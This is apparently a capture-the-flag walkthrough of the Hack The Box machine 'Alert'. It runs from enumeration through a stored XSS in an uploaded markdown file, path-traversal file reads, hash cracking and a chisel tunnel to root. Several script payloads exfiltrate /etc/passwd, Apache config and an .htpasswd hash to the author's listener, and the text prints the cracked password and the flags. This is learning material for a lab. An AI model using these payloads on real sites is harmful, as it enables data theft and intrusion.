HTB Alert - 🐧
Enumeration
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
nmap -sC -sV -Pn -A alert.htb
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-01 18:43 IST
Nmap scan report for alert.htb (10.10.11.44)
Host is up (0.19s latency).
Not shown: 941 closed tcp ports (conn-refused), 57 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 7e:46:2c:46:6e:e6:d1:eb:2d:9d:34:25:e6:36:14:a7 (RSA)
| 256 45:7b:20:95:ec:17:c5:b4:d8:86:50:81:e0:8c:e8:b8 (ECDSA)
|_ 256 cb:92:ad:6b:fc:c8:8e:5e:9f:8c:a2:69:1b:6d:d0:f7 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-title: Alert - Markdown Viewer
|_Requested resource was index.php?page=alert
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 37.68 seconds
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt -u http://alert.htb -H "Host: FUZZ.alert.htb" -ac
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://alert.htb
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt
:: Header : Host: FUZZ.alert.htb
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
statistics [Status: 401, Size: 467, Words: 42, Lines: 15, Duration: 196ms]
:: Progress: [19966/19966] :: Job [1/1] :: 208 req/sec :: Duration: [0:01:41] :: Errors: 0 ::
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
dirsearch -u http://alert.htb
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /home/d31ty/reports/http_alert.htb/_25-01-01_18-41-00.txt
Target: http://alert.htb/
[18:41:00] Starting:
[18:41:07] 403 - 274B - /.ht_wsr.txt
[18:41:07] 403 - 274B - /.htaccess.sample
[18:41:07] 403 - 274B - /.htaccess.bak1
[18:41:07] 403 - 274B - /.htaccess.save
[18:41:07] 403 - 274B - /.htaccess_extra
[18:41:07] 403 - 274B - /.htaccess.orig
[18:41:07] 403 - 274B - /.htaccess_orig
[18:41:07] 403 - 274B - /.htaccessOLD2
[18:41:07] 403 - 274B - /.htaccessOLD
[18:41:07] 403 - 274B - /.htaccessBAK
[18:41:07] 403 - 274B - /.htaccess_sc
[18:41:07] 403 - 274B - /.htm
[18:41:07] 403 - 274B - /.html
[18:41:07] 403 - 274B - /.htpasswd_test
[18:41:07] 403 - 274B - /.htpasswds
[18:41:08] 403 - 274B - /.httr-oauth
[18:41:10] 403 - 274B - /.php
[18:41:50] 200 - 24B - /contact.php
[18:41:52] 301 - 304B - /css -> http://alert.htb/css/
[18:42:16] 301 - 309B - /messages -> http://alert.htb/messages/
[18:42:33] 403 - 274B - /server-status/
[18:42:33] 403 - 274B - /server-status
[18:42:44] 301 - 308B - /uploads -> http://alert.htb/uploads/
[18:42:44] 403 - 274B - /uploads/
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
gobuster dir -u http://alert.htb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x tar,php,cgi,txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://alert.htb/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: tar,php,cgi,txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.php (Status: 302) [Size: 660] [--> index.php?page=alert]
/.php (Status: 403) [Size: 274]
/contact.php (Status: 200) [Size: 24]
/uploads (Status: 301) [Size: 308] [--> http://alert.htb/uploads/]
/css (Status: 301) [Size: 304] [--> http://alert.htb/css/]
/messages (Status: 301) [Size: 309] [--> http://alert.htb/messages/]
/messages.php (Status: 200) [Size: 1]
On statistics subdomain
There is login page, on wrong creds
Apache/2.4.41 (Ubuntu) Server at statistics.alert.htb Port 80
I found the md file uploader is vulnerable to XSS injection. Then trying XSS to RCE was not quite achievable as the js file uploaded is not executed. Also when I upload the js file, the share feature is disabled by server. So it was clueless for me.
The initial foothold on where to search was quite tiring as I couldn’t find the spot of the vulnerable location. Then after so time of recon, I found we should create a script to callback the md using the contact page as when we submit, the link gets clicked and executed in the server by the admin.
So first I thought let’s find through the /messages
1
2
3
4
5
6
7
8
9
10
11
12
13
14
<script>
var url = "http://alert.htb/index.php?page=messages"
var attacker = "http://10.10.14.108:7890/exfil"
var xhr = new XMLHttpRequest()
xhr.onreadystatechange = function () {
if (xhr.readyState == XMLHttpRequest.DONE) {
fetch(attacker + "?" + encodeURI(btoa(xhr.responseText)))
}
}
xhr.open("GET", url, true)
xhr.send(null)
</script>
![[Screenshot 2025-02-11 at 23.13.53.png]]
But again it is not fruitful at all. Then again the index page was not giving anything information, tried LFI. But didn’t work. Earlier in our gobuster scan we saw total of 3 php request with 200 status, so tried one by one in that, with the js payload.
succeeded in the messages.php
1
2
3
4
5
6
7
8
9
10
11
12
<script>
var url = "http://alert.htb/messages.php?file=../../../../../../../etc/passwd"
var attacker = "http://10.10.14.108:7890/exfil"
var xhr = new XMLHttpRequest()
xhr.onreadystatechange = function () {
if (xhr.readyState == XMLHttpRequest.DONE) {
fetch(attacker + "?" + encodeURI(btoa(xhr.responseText)))
}
}
xhr.open("GET", url, true)
xhr.send(null)
</script>
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
fwupd-refresh:x:111:116:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
usbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:113:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
albert:x:1000:1000:albert:/home/albert:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
david:x:1001:1002:,,,:/home/david:/bin/bash
Found user david and albert
Then I tried to grep the id_rsa files and /etc/shadow but no success.
After some time of further enumeration of the file system of apache, found this information might be useful watching, successfully I got some info.
1
2
3
4
5
6
7
8
9
10
11
12
<script>
var url = "http://alert.htb/messages.php?file=../../../../../../../etc/apache2/sites-available/000-default.conf"
var attacker = "http://10.10.14.108:7890/exfil"
var xhr = new XMLHttpRequest()
xhr.onreadystatechange = function () {
if (xhr.readyState == XMLHttpRequest.DONE) {
fetch(attacker + "?" + encodeURI(btoa(xhr.responseText)))
}
}
xhr.open("GET", url, true)
xhr.send(null)
</script>
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
<pre><VirtualHost *:80>
ServerName alert.htb
DocumentRoot /var/www/alert.htb
<Directory /var/www/alert.htb>
Options FollowSymLinks MultiViews
AllowOverride All
</Directory>
RewriteEngine On
RewriteCond %{HTTP_HOST} !^alert\.htb$
RewriteCond %{HTTP_HOST} !^$
RewriteRule ^/?(.*)$ http://alert.htb/$1 [R=301,L]
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
<VirtualHost *:80>
ServerName statistics.alert.htb
DocumentRoot /var/www/statistics.alert.htb
<Directory /var/www/statistics.alert.htb>
Options FollowSymLinks MultiViews
AllowOverride All
</Directory>
<Directory /var/www/statistics.alert.htb>
Options Indexes FollowSymLinks MultiViews
AllowOverride All
AuthType Basic
AuthName "Restricted Area"
AuthUserFile /var/www/statistics.alert.htb/.htpasswd
Require valid-user
</Directory>
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
</pre>
This file caught my eye: AuthUserFile /var/www/statistics.alert.htb/.htpasswd
Now trying that got me hash of user albert.
1
2
3
<pre>
albert:$apr1$bMoRBJOg$igG8WBtQ1xYDTQdLjSWZQ/
</pre>
For some reason hashcat couldn’t be ran, so I used john to crack the password.
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Based on the suggestion while running the above command, used this modified version: john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=md5crypt-long
Cracked the password: manchesterunited (albert)
I used this password to try and login ssh, and boom I’m in. Also these credentials seems to be helpful to login in the http://statistics.alert.htb but nothing useful to see there. Just another rabbit hole.
Got the user flag: 4f5dac8d20e09c72751b65bdd1890d21
Priv Escalation
Ran linpeas.sh No SUI found to be useful.
As per per linpeas found this: Vulnerable to CVE-2021-3560 But it didn’t work.
/opt/website-monitor/.git => This seemed interesting
Then it also gave this result, so then I ran the command to see what’s running locally. ss -lntp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
alert
127.0.0.1 localhost
127.0.1.1 alert
127.0.0.1 alert.htb
127.0.0.1 statistics.alert.htb
::1 ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
nameserver 127.0.0.53
options edns0 trust-ad
1
2
3
4
5
6
7
8
9
albert@alert:/tmp$ ss -lntp
State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
LISTEN 0 4096 127.0.0.1:8080 0.0.0.0:*
LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:*
LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
LISTEN 0 511 *:80 *:*
LISTEN 0 128 [::]:22 [::]:*
albert@alert:/tmp$
Chisel commands:
1
chisel server --socks5 --reverse -p 4567
1
./chisel client --fingerprint Ung4PysNZn6IJAZ1Qsu7+ursZ3TqFKVomWv5AhhRA9I= 10.10.14.45:4567 R:1234:127.0.0.1:8080
![[Screenshot 2025-02-13 at 15.45.47.png]]
![[Screenshot 2025-02-13 at 15.46.02.png]]
broke.lol and neatnik are services found => Another rabbithole
![[Screenshot 2025-02-13 at 15.52.57.png]]
![[Screenshot 2025-02-13 at 15.51.16.png]]
Then seems like we could symlink the path.
ln -s /root/root.txt root.txt
Then we could read the root file in the browser, but this method I found on the internet. I was not fully satisfied in it. Then I noticed the other user group management in the /opt folder write access. So simple rev shell worked to gain root access.
![[Screenshot 2025-02-13 at 15.55.55.png]]
![[Screenshot 2025-02-13 at 15.56.38.png]]
![[Screenshot 2025-02-13 at 15.57.39.png]]
![[Screenshot 2025-02-13 at 15.57.27.png]]
Root flag: 54b6fcbaa0c2c5143efcf9674080a63f